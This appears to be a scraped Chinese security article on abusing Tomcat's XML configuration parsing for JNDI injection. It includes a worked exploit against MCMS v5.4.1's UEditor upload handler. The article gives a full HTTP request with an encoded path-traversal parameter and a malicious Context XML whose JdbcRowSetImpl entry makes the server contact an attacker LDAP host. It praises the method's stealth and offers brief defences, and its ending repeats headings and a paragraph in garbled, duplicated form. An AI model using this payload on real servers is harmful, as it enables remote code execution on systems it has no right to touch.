利用Tomcat XML配置机制实现JNDI注入绕过文件上传校验<\/h1>

技术原理分析<\/h2>

Tomcat XML配置解析机制<\/h3>
Tomcat在启动和运行过程中会扫描特定目录下的XML配置文件，并对其中的特定标签进行解析处理。该机制会调用XML文件中指定类的setter方法，类似于FastJSON的反序列化机制。<\/p>

核心触发点<\/h3>

1. 启动阶段解析<\/strong><\/p>

主入口：Bootstrap.class<\/code>的load<\/code>方法<\/li>
调用链：Bootstrap.load()<\/code> → Catalina.load()<\/code> → 创建Digester<\/code>实例<\/li>
解析文件：conf\/server.xml<\/code><\/li> <\/ul> 2. XML解析过程<\/strong><\/p> 使用Digester<\/code>解析XML内容<\/li> 对Listener<\/code>字段的className<\/code>属性指定类进行实例化<\/li> 调用SetPropertiesRule#begin<\/code>进行属性赋值<\/li> 通过IntrospectionUtils#setProperty<\/code>反射调用setter方法<\/li> <\/ul> 3. 关键目录<\/strong><\/p> conf\/server.xml<\/code> - 主配置文件<\/li> conf\/Catalina\/localhost\/<\/code> - 虚拟主机配置目录<\/li> webapps\/*\/META-INF\/context.xml<\/code> - Web应用上下文配置<\/li> <\/ul> 攻击向量分析<\/h2> 可利用的XML配置位置<\/h3> 1. server.xml配置注入<\/strong><\/p> <Listener<\/span> className=<\/span>"恶意类名"<\/span> <\/span><\/span> property1=<\/span>"恶意值"<\/span> <\/span><\/span> property2=<\/span>"jndi:ldap:\/\/攻击者地址"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre>2. Context配置注入<\/strong><\/p> <Context><\/span> <\/span><\/span> <Manager<\/span> className=<\/span>"com.sun.rowset.JdbcRowSetImpl"<\/span> <\/span><\/span> dataSourceName=<\/span>"ldap:\/\/127.0.0.1:8085\/恶意路径"<\/span> <\/span><\/span> autoCommit=<\/span>"true"<\/span>\/><\/span> <\/span><\/span><\/Context><\/span> <\/span><\/span><\/code><\/pre>自动触发机制<\/h3> Tomcat存在后台线程，每10秒执行一次检查：<\/p> StandarHost<\/code>容器会触发deployApps<\/code>方法<\/li> 自动重新部署和解析XML配置文件<\/li> 无需重启Tomcat即可触发攻击<\/li> <\/ul> 实战案例：MCMS v5.4.1漏洞利用<\/h2> 漏洞分析<\/h3> 漏洞文件<\/strong>：com.baidu.ueditor.ActionEnter<\/code><\/p> 未对jsonConfig<\/code>进行充分校验<\/li> savePath<\/code>参数可目录穿越<\/li> <\/ul> 关键代码路径<\/strong>：<\/p> ActionEnter<\/code>接收请求参数<\/li> ConfigManager.getConfig()<\/code>直接获取filePathFormat<\/code><\/li> Uploader<\/code>使用未经验证的savePath<\/code>拼接文件路径<\/li> <\/ol> 文件上传限制绕过<\/h3> 允许的文件类型<\/strong>包含.xml<\/code>：<\/p> "fileAllowFiles"<\/span>:<\/span> [ <\/span><\/span> ".png"<\/span>, ".jpg"<\/span>, ".jpeg"<\/span>, ".gif"<\/span>, ".bmp"<\/span>, <\/span><\/span> ".flv"<\/span>, ".swf"<\/span>, ".mkv"<\/span>, ".avi"<\/span>, ".rm"<\/span>, ".rmvb"<\/span>, ".mpeg"<\/span>, ".mpg"<\/span>, <\/span><\/span> ".ogg"<\/span>, ".ogv"<\/span>, ".mov"<\/span>, ".wmv"<\/span>, ".mp4"<\/span>, ".webm"<\/span>, ".mp3"<\/span>, ".wav"<\/span>, ".mid"<\/span>, <\/span><\/span> ".rar"<\/span>, ".zip"<\/span>, ".tar"<\/span>, ".gz"<\/span>, ".7z"<\/span>, ".bz2"<\/span>, ".cab"<\/span>, ".iso"<\/span>, <\/span><\/span> ".doc"<\/span>, ".docx"<\/span>, ".xls"<\/span>, ".xlsx"<\/span>, ".ppt"<\/span>, ".pptx"<\/span>, ".pdf"<\/span>, ".txt"<\/span>, ".md"<\/span>, ".xml"<\/span> <\/span><\/span>] <\/span><\/span><\/code><\/pre>攻击Payload<\/h3> HTTP请求<\/strong>：<\/p> POST<\/span> \/static\/plugins\/ueditor\/1.4.3.3\/jsp\/editor.do?jsonConfig=%7b%66%69%6c%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%7b%2e%7d%2e%2f%7b%2e%7d%2e%2f%7b%2e%7d%2e%2f%2f%63%6f%6e%66%2f%43%61%74%61%6c%69%6e%61%2f%6c%6f%63%61%6c%68%6f%73%74%2f%31%27%7d&action=uploadfile HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 127.0.0.1:8080<\/span> <\/span><\/span>Content-Type:<\/span> multipart\/form-data;boundary=------------------------AuIwirENRLZwUJSzValDLkEbUhZbrxlJuvZrhFXA<\/span> <\/span><\/span> <\/span><\/span>--------------------------AuIwirENRLZwUJSzValDLkEbUhZbrxlJuvZrhFXA <\/span><\/span>Content-Disposition: form-data; name="upload"; filename="2.xml" <\/span><\/span> <\/span><\/span><?xml version='1.0' encoding='utf-8'?> <\/span><\/span><Context> <\/span><\/span> <Manager className="com.sun.rowset.JdbcRowSetImpl" <\/span><\/span> dataSourceName="ldap:\/\/127.0.0.1:8085\/SbfXuVhz" <\/span><\/span> autoCommit="true"\/> <\/span><\/span><\/Context> <\/span><\/span>--------------------------AuIwirENRLZwUJSzValDLkEbUhZbrxlJuvZrhFXA-- <\/span><\/span><\/code><\/pre>目录穿越技巧<\/strong>：<\/p> 使用\/{.}\/{.}\/{.}\/\/conf\/Catalina\/localhost\/1<\/code>进行路径穿越<\/li> 将恶意XML文件上传至Tomcat配置目录<\/li> <\/ul> 技术要点总结<\/h2> 1. 利用条件<\/h3> 存在任意文件上传漏洞<\/li> 可上传XML文件到服务器<\/li> 具有目录穿越能力或可直接写入Tomcat配置目录<\/li> 目标使用Tomcat容器<\/li> <\/ul> 2. 优势特点<\/h3> 绕过传统文件后缀校验<\/li> 利用Tomcat内置机制，无需额外依赖<\/li> 支持自动触发，无需重启服务<\/li> 可与FastJSON等反序列化漏洞结合利用<\/li> <\/ul> 3. 防御建议<\/h3> 严格校验文件上传路径，防止目录穿越<\/li> 限制XML文件上传功能<\/li> 监控Tomcat配置目录的写操作<\/li> 使用安全策略限制JNDI访问<\/li> <\/ul> 调用栈分析<\/h2> server.xml解析栈<\/h3> Digester.startElement() → SetPropertiesRule.begin() → IntrospectionUtils.setProperty() → 反射调用setter方法 <\/code><\/pre> Context配置解析栈<\/h3> MbeansDescriptorsDigesterSource.execute() → Registry.loadDescriptors() → Digester.parse() → ObjectCreateRule.begin() <\/code><\/pre> 该技术利用Tomcat的正常功能实现攻击，具有较高的隐蔽性和实用性，是文件上传漏洞利用的重要扩展方式。<\/p>

利用Tomcat XML配置机制实现JNDI注入绕过文件上传校验<\/h1>

技术原理分析<\/h2>

Tomcat XML配置解析机制<\/h3> Tomcat在启动和运行过程中会扫描特定目录下的XML配置文件，并对其中的特定标签进行解析处理。该机制会调用XML文件中指定类的setter方法，类似于FastJSON的反序列化机制。<\/p>

攻击向量分析<\/h2>

实战案例：MCMS v5.4.1漏洞利用<\/h2>

技术要点总结<\/h2>

调用栈分析<\/h2>

Tomcat XML配置解析机制<\/h3>
Tomcat在启动和运行过程中会扫描特定目录下的XML配置文件，并对其中的特定标签进行解析处理。该机制会调用XML文件中指定类的setter方法，类似于FastJSON的反序列化机制。<\/p>